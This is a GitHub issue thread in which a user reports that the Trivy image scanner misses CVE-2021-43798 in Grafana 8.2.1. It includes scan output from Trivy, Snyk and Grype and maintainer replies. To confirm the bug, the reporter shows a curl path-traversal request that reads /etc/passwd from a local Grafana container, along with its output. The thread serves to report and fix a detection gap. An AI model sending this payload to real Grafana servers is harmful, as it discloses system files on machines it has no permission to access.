Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Trivy not detecting CVE-2021-43798: Grafana directory traversal ? #1459

Closed
stefanlasiewski opened this issue Dec 12, 2021 · 9 comments
Closed

Trivy not detecting CVE-2021-43798: Grafana directory traversal ? #1459

stefanlasiewski opened this issue Dec 12, 2021 · 9 comments
Labels
kind/bug Categorizes issue or PR as related to a bug. lifecycle/stale Denotes an issue or PR has remained open with no activity and will be auto-closed.

Comments

@stefanlasiewski
Copy link

stefanlasiewski commented Dec 12, 2021
edited
Loading

Description

Grafana issued a notice about CVE-2021-43798: Grafana directory traversal this week. It affects all Grafana 8.x instances.

https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/

However, Trivy doesn't seem to be picking it up. Why os this?

What did you expect to happen?

I expect this command to list CVE-2021-43798:

trivy --debug image --severity HIGH,CRITICAL grafana/grafana:8.2.1 |grep CVE-2021-43798

What happened instead?

It doesn't list this CVE:

$ trivy --debug image --severity HIGH,CRITICAL grafana/grafana:8.2.1 |grep CVE-2021-43798
$

Output of run with -debug:

2021-12-12T13:22:19.529-0800	�[35mDEBUG�[0m	Severities: HIGH,CRITICAL
2021-12-12T13:22:19.573-0800	�[35mDEBUG�[0m	cache dir:  /Users/USER/Library/Caches/trivy
2021-12-12T13:22:19.574-0800	�[35mDEBUG�[0m	DB update was skipped because DB is the latest
2021-12-12T13:22:19.574-0800	�[35mDEBUG�[0m	DB Schema: 1, Type: 1, UpdatedAt: 2021-12-12 18:40:08.31377395 +0000 UTC, NextUpdate: 2021-12-13 00:40:08.31377365 +0000 UTC, DownloadedAt: 2021-12-12 21:17:12.759986 +0000 UTC
2021-12-12T13:22:19.574-0800	�[35mDEBUG�[0m	Vulnerability type:  [os library]
2021-12-12T13:22:19.581-0800	�[35mDEBUG�[0m	Image ID: sha256:092a480a2531b3479d9c8591169723f2b49c79e8ec4b76b9f8aad3faaeb405ec
2021-12-12T13:22:19.581-0800	�[35mDEBUG�[0m	Diff IDs: [sha256:e2eb06d8af8218cfec8210147357a68b7e13f7c485b991c288c2d01dc228bb68 sha256:f865a4a4507d0e4e597a98697aacb4f32fe33e40bfe87c751ce7d4b4ccb0f6ff sha256:6b5061d1e966a1981e77ac13b2b3f3db7d0432e46c1f580442b7b0f6bbb66adf sha256:259ecfabcacfdfc827c042f41875cccc3eda532b2bbc40a0d2318302a1dbc1de sha256:bf9d934f4f2adbf028c4e223e087ae2efbb79165e20ab7f706b67207efb4e0bb sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef sha256:c83dbe321467a37a213390da75e76aedc0a850cba33409fbddc178b4ff659ce6 sha256:46abefb2a8e81cc2a20eae36faa15582f2b209d9d29a6902a1df227b69cb9f49]
2021-12-12T13:22:19.584-0800	�[34mINFO�[0m	Detected OS: alpine
2021-12-12T13:22:19.584-0800	�[34mINFO�[0m	Detecting Alpine vulnerabilities...
2021-12-12T13:22:19.584-0800	�[35mDEBUG�[0m	alpine: os version: 3.14
2021-12-12T13:22:19.584-0800	�[35mDEBUG�[0m	alpine: the number of packages: 34
2021-12-12T13:22:19.585-0800	�[34mINFO�[0m	Number of language-specific files: 2
2021-12-12T13:22:19.585-0800	�[34mINFO�[0m	Detecting gobinary vulnerabilities...
2021-12-12T13:22:19.585-0800	�[35mDEBUG�[0m	Detecting library vulnerabilities, type: gobinary, path: usr/share/grafana/bin/grafana-cli
2021-12-12T13:22:19.585-0800	�[35mDEBUG�[0m	Detecting library vulnerabilities, type: gobinary, path: usr/share/grafana/bin/grafana-server

grafana/grafana:8.2.1 (alpine 3.14.2)
=====================================
Total: 18 (HIGH: 18, CRITICAL: 0)

+------------+------------------+----------+-------------------+---------------+---------------------------------------+
|  LIBRARY   | VULNERABILITY ID | SEVERITY | INSTALLED VERSION | FIXED VERSION |                 TITLE                 |
+------------+------------------+----------+-------------------+---------------+---------------------------------------+
| busybox    | CVE-2021-42378   | HIGH     | 1.33.1-r3         | 1.33.1-r6     | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42378 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42379   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42379 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42380   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42380 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42381   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42381 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42382   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42382 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42383   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42383 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42384   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42384 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42385   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42385 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42386   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42386 |
+------------+------------------+          +                   +               +---------------------------------------+
| ssl_client | CVE-2021-42378   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42378 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42379   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42379 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42380   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42380 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42381   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42381 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42382   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42382 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42383   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42383 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42384   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42384 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42385   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42385 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42386   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42386 |
+------------+------------------+----------+-------------------+---------------+---------------------------------------+

usr/share/grafana/bin/grafana-cli (gobinary)
============================================
Total: 0 (HIGH: 0, CRITICAL: 0)


usr/share/grafana/bin/grafana-server (gobinary)
===============================================
Total: 0 (HIGH: 0, CRITICAL: 0)

Output of trivy -v:

$ trivy -v
Version: 0.21.2
Vulnerability DB:
  Type: Full
  Version: 1
  UpdatedAt: 2021-12-12 18:40:08.31377395 +0000 UTC
  NextUpdate: 2021-12-13 00:40:08.31377365 +0000 UTC
  DownloadedAt: 2021-12-12 21:17:12.759986 +0000 UTC

Additional details (base image name, container registry info...):

n/a
@stefanlasiewski stefanlasiewski added the kind/bug Categorizes issue or PR as related to a bug. label Dec 12, 2021
@stefanlasiewski
Copy link
Author

I can confirm that this container version is vulnerable:

$ docker run --rm -d --name=grafana -p 3000:3000 grafana/grafana:8.2.1
94635778b7021e165ae5d1c88a6b5203ad10a527a6071ec4d64a2426b2550b3f
$ docker ps
CONTAINER ID   IMAGE                   COMMAND     CREATED         STATUS         PORTS                    NAMES
94635778b702   grafana/grafana:8.2.1   "/run.sh"   7 seconds ago   Up 6 seconds   0.0.0.0:3000->3000/tcp   grafana

$ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../VERSION
8.2.1
$ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin

@jerbia
Copy link
Contributor

jerbia commented Dec 12, 2021

@knqyf263 I suspect Grafana is not installed through a package manager, but it's deployed as a binary, which currently Trivy does not support?

@afdesk
Copy link
Contributor

afdesk commented Dec 13, 2021

@stefanlasiewski thanks for your report!
let me investigate it.

@afdesk
Copy link
Contributor

afdesk commented Dec 13, 2021

@jerbia you're right, Grafana deployed as a binary, and trivy doesn't detect it.

@stefanlasiewski
Copy link
Author

stefanlasiewski commented Dec 13, 2021
edited
Loading

@afdesk Interesting. Is there a way for Trivy to detect this? Does Trivy look at the md5 sums of installed binaries, for example?

For the record, docker scan (which uses Snyk) doesn't find the vulnerability either:

$ docker scan --severity medium grafana/grafana:8.2.1

Testing grafana/grafana:8.2.1...

Organization:      stefanlasiewski
Package manager:   apk
Project name:      docker-image|grafana/grafana
Docker image:      grafana/grafana:8.2.1
Platform:          linux/amd64
Base image:        grafana/grafana:8.2.1
Licenses:          enabled

✓ Tested 34 dependencies for known issues, no vulnerable paths found.

Base Image             Vulnerabilities  Severity
grafana/grafana:8.2.1  11               0 critical, 0 high, 0 medium, 11 low

Recommendations for base image upgrade:

Minor upgrades
Base Image             Vulnerabilities  Severity
grafana/grafana:8.3.2  0                0 critical, 0 high, 0 medium, 0 low

And neither does Anchore's SBOM method with syft/grype (FTR: Grype's issue is at anchore/grype#534 )

$ grype -q grafana/grafana:8.2.1
NAME                              INSTALLED                             FIXED-IN   VULNERABILITY        SEVERITY 
busybox                           1.33.1-r3                             1.33.1-r4  CVE-2021-42374       Medium    
busybox                           1.33.1-r3                             1.33.1-r5  CVE-2021-42375       Medium    
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42378       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42379       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42380       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42381       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42382       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42383       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42384       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42385       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42386       High      
github.com/cortexproject/cortex   v1.8.2-0.20210428155238-d382e1d80eaf             GHSA-jphm-g89m-v42p  Medium    
github.com/google/flatbuffers     v1.12.0                                          CVE-2020-35864       High      
github.com/grafana/loki           v1.6.2-0.20210520072447-15d417efe103             GHSA-grj5-8x6q-hc9q  Medium    
github.com/grafana/loki           v1.6.2-0.20210520072447-15d417efe103             CVE-2021-36156       Medium    
github.com/prometheus/prometheus  v1.8.2-0.20210621150501-ff58416a0b02             CVE-2019-3826        Medium    
google.golang.org/protobuf        v1.27.1                                          CVE-2015-5237        High      
ssl_client                        1.33.1-r3                             1.33.1-r4  CVE-2021-42374       Medium    
ssl_client                        1.33.1-r3                             1.33.1-r5  CVE-2021-42375       Medium    
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42378       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42379       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42380       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42381       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42382       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42383       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42384       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42385       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42386       High

@afdesk
Copy link
Contributor

afdesk commented Dec 13, 2021
edited
Loading

@stefanlasiewski in this case, trivy detected and checked two binary files grafana-cli and grafana-server (contains three medium vulnerabilities).
but the app is a scope of files... need to think over it.

maybe i miss something

Thanks for your investigation!

@github-actions
Copy link

This issue is stale because it has been labeled with inactivity.

@github-actions github-actions bot added the lifecycle/stale Denotes an issue or PR has remained open with no activity and will be auto-closed. label Feb 13, 2022
@stefanlasiewski
Copy link
Author

Hi @afdesk Do you happen to have any fixes in mind for this? It's till happening on Trivy 0.23.

stefanl@stefanl:~ $ docker run --rm -d --name=grafana -p 3000:3000 grafana/grafana:8.2.1

stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../VERSION
8.2.1stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
,,,

stefanl@stefanl:~ $ trivy --version
Version: 0.23.0

@github-actions github-actions bot removed the lifecycle/stale Denotes an issue or PR has remained open with no activity and will be auto-closed. label Feb 18, 2022
@DmitriyLewen DmitriyLewen mentioned this issue Mar 23, 2022
Closed
@github-actions
Copy link

This issue is stale because it has been labeled with inactivity.

@github-actions github-actions bot added the lifecycle/stale Denotes an issue or PR has remained open with no activity and will be auto-closed. label Apr 19, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
kind/bug Categorizes issue or PR as related to a bug. lifecycle/stale Denotes an issue or PR has remained open with no activity and will be auto-closed.
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@stefanlasiewski @jerbia @afdesk